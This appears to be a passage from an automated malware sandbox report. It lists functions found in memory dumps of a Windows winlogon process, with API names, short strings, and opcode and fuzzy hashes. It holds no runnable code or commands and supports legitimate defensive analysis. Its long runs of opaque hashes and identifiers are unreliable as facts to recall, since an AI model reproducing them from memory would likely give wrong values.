                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: 0f4212df039294fefdde6ff96b437b18f0d6b6311749627e01e145e3100ab471
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: F431F429312E20F1EE25DBCAA80875523D4BF48BA2F3985259D1E8B79ADF38C047C300
                                                              Function 00000225DC653DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: 158becd88709c9cbcacd230cd8387edf0a13bed790f97ee48f9835d8b457c441
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: 5A119135720F6096E7608BDAE84831977A0F788FE6F248225EB5E877A4CF78C914C740
                                                              Function 00000225DC6B3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: 6e1e93a200b7bd570fa0b190f4c403581b2cb531a58d9972e87f4823fb88df5f
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: 1E11BC35310FA096E7508B9AE848319B7A5F388FE7F088225EB1E877A4CF38C805C740
                                                              Function 00000225DC6A3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: 5626651945d5fb8906f413eb53f91b70d6605e573597d601334c82dde5c84599
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: 40118B2A304F6092EF189BAAE40C269B3A5FB88F86F148038DF8943794EF3DC505C704
                                                              Function 00000225DC6A5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction ID: 0ad3d618e1835294593f6452ab590f590bc81cd41d15a12307719c1f0daf2064
                                                              • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction Fuzzy Hash: C9D1AC7A208F9895DB70DB4AE49435A7BA0F7C8B89F104116EACD87BA9DF3CC551CB40
                                                              Function 00000225DC642F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 2e98920b3895b546e8cfee93848436d20f1d91fbd890dc42e4983bef65e91d92
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 9131CE2A309F65A2EB52CFDEE54872A77A0FB44B86F18C1209F4A47B55EF34C4A1C300
                                                              Function 00000225DC6A2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 6d0a1707391fcb5c153528b149007a8a8c9fe1f40df049437015618af4cf0edf
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 5E31B23A781F61A2EA15CF9EE54876967A1FB48B86F18C0309F4C87B55EF34D4A1C300
                                                              Function 00000225DC64CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: 4157702fcb9233f49a77c46e803b27685ba528657f510afb3a862d3f666b09f6
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: B3119D2874CE6071FE64ABFE954D32932426B95BB6F10C3A4A837477EADE78C441C200
                                                              Function 00000225DC6ACFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: 6f9918c3cbd4a8341a5960baa032c6c80083ab5fabd7ed8650c6535314c37da2
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: B9119D68300E6061FA68EBFE564D32922426F987B6F30C324A836C77EADE78C441C201
                                                              Function 00000225DC64199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: c75f4c628c11a50a5007a532dfe706c93d8ee4e04b1e1be502c9ae2a36d6589c
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: 0E016929314E5092EB60DB9AA84C35963A1F788BC6F988075DF8A43754DF3CC989C740
                                                              Function 00000225DC6A199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: cb2a63c83e44a23da2db583fd32e9b754654e1e9db48b59022d394c89ab082b1
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: 99016929300E5092EB18DB9AA89C35963A6FB88BC6F988035DF4D83754DF3CC989C740
                                                              Function 00000225DC6436C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 5377c2d080006a4fe2cd119959f91c4f1597db279fc077c9b970d2bb0f292206
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: E101296D325F6492FB649BAAE80C71A73A0BB49B87F148464CE4A07765EF3DC158C704
                                                              Function 00000225DC6A36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 3adde3a003b7029c84831e13eabd217eaefc6f8cdf697e4629c9387f833a695b
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: FB012969211F60A2EB289BAAE91C71977A1BB59B87F188424CE4947764EF3DC148C704
                                                              Function 00000225DC648FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction ID: b166926d79cf74f009588074e3820990c0fc1e07a97fa4e01069ba2e3ee14553
                                                              • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction Fuzzy Hash: 6651BF3A75DA20EAEB14DF99E84CB5937AAF344B8AF10C5A4DA174778CDB35C842C700
                                                              Function 00000225DC6A8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction ID: 599e737887705c3809ce4680662d838ae3905f4783b37dc68dc1ccc8eae22418
                                                              • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction Fuzzy Hash: 78519F3A701A20AAEB14DFA9E84CB5937A6F344BCAF30C524DA568778DDB75DD42C700
                                                              Function 00000225DC641A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: e535c0649dfb5c656df934673802aa2881829a80634b4f76755b7f08d64bed47
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: 69F04466718E51A2E7608BE9F9887596761F748BC9F94C020DB4A46654DF3CC68DCB00
                                                              Function 00000225DC6A1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: 2a81db31a951e5e259a4acc7b5a595b85a3b479c602b75ed73f30d03813019d1
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: BBF06866304E51A2EB60CFE9F9C87597762F748B8AF94C020DB4946654DF3CC64DCB00
                                                              Function 00000225DC643044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: 05bf48fb40d5b317a8235632c964cef6d02a25c8f7691d3038dd68194b884147
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: 51F08C28328FA4A2FA448FDBB90C1196260AB48FD2F18E170EF4A07B58DF3CC485C700
                                                              Function 00000225DC64BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: 44bd982de87b7b9a06009664450f2777bab72fc188efb7fa02744482d7f49e87
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 72F09669329F14A1EB108FECE44C3596361EB89766F648259DB6A462F4CF3CC044C740
                                                              Function 00000225DC6A3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: fb1c96070f1bbd8c52466b515c03c742fb3955bbc3562a61c2f5362b02f3ede6
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: 5BF05828204FA4A2EA588FDBB9081197262AB48FC2F08E030EF4A47B18DF38C445C700
                                                              Function 00000225DC6ABC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: 859cf1714d0438efb9fd229f799e05916821dabd80631214c70755d8405ab38f
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 21F09679311F15A1FB148BEDE84C3596361EB84767F548219CB6A452F4DF3CC444C740
                                                              Function 00000225DC6A50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction ID: cc4e45ee1de0211bceb984575181e682b35c92b14fcfce5c930bbfc96d3dc94e
                                                              • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction Fuzzy Hash: EA02C836219F9496EB60CB99F49435AB7A0F3C5795F209015EB8E87BA9DF7CC444CB00
                                                              Function 00000225DC645710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                              • Instruction ID: 8f9846ecf6cf7499faee6b5ce6658377365f055e4165f45403509503972279d5
                                                              • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                              • Instruction Fuzzy Hash: 6561CD3A51DF94D6E760CB99E44831AB7A0F3C8796F109165EA8E87BA8DB7CC544CF00
                                                              Function 00000225DC6A5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction ID: c0f1102daedf8fd83df05dbad566c9dcb67f0f52cae9f12d02fc669b962d21e9
                                                              • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction Fuzzy Hash: DB61EE3A519F94D6E760CB99E54831AB7E0F388786F209115FA8E87BA8DB7CC554CF00
                                                              Function 00000225DC654104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: a15945065d89435b6d58080b2ea34464beef53a1596a2d5ce657289fdf07ecc6
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: 5911733EA34E7131F67415ECD45D3751151EB783FAF38C6A4A976076D6DA34C841E200
                                                              Function 00000225DC6B4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 790992d3fedfbb3f0c19deaeddb177f6f54104038671def6cf99952e65a916c8
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: 2711733EE14E7131F66415ECD45D3751243EB783BBF18C624AA7E076D6CA34C841E210
                                                              Function 00000225DC623504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 0f0cd1f3b4902091acada321e62a835e8ba03bea7c675b6eead67c7f9176ca24
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: 6B11C63AA60E3131FB6415ECE45D37991C86B58BB6F48C639A97F2E3D6CB34C881C200
                                                              Function 00000225DC683504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 4770082600421d2f4bb53b6383fc8d4b46f38f5b83b98cacefa30fc3353db637
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: 4111EC3E6A4E3131FA54D5ECE44D37911906F59F76F48C638A976067DACA78C841C203
                                                              Function 00000225DC61F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
